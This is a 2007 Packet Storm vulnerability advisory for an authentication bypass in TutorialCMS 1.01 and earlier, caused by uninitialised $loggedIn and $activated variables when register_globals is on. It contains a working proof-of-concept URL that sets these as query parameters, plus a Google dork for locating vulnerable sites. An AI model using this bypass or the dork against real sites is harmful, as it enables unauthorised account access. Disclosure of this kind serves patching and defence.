tutorialcms-bypass.txt

2007-05-22T00:00:00
ID PACKETSTORM:56877
Type packetstorm
Reporter Silentz
Modified 2007-05-22T00:00:00

Description

                                        
                                            `#################################################################################  
# #  
# TutorialCMS <= 1.01 Authentication Bypass #  
# #  
# Discovered by: Silentz #  
# Payload: Authentication Bypass #  
# Website: http://www.w4ck1ng.com #  
# #  
# Vulnerability: #  
# #  
# Variables $loggedIn & $activated are not predefined. #  
# #  
# Vulnerable Files: #  
# #  
# login.php #  
# headerLinks.php #  
# submit1.php #  
# myFav.php #  
# userCP.php #  
# #  
# #  
# PoC: http://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1 #  
# #  
# Subject To: register_globals set to on #  
# GoogleDork: "Powered By Photoshop Tutorials" #  
# #  
# Shoutz: The entire w4ck1ng community #  
# #  
# Notes to developers: #  
# #  
# You should allways fully disclose the vulnerabilities before someone #  
# else does, just looks better. Also, try changing the "Date Modified" #  
# stamp on the files before you wrap it up for upload ;) #  
# #  
#################################################################################  
  
`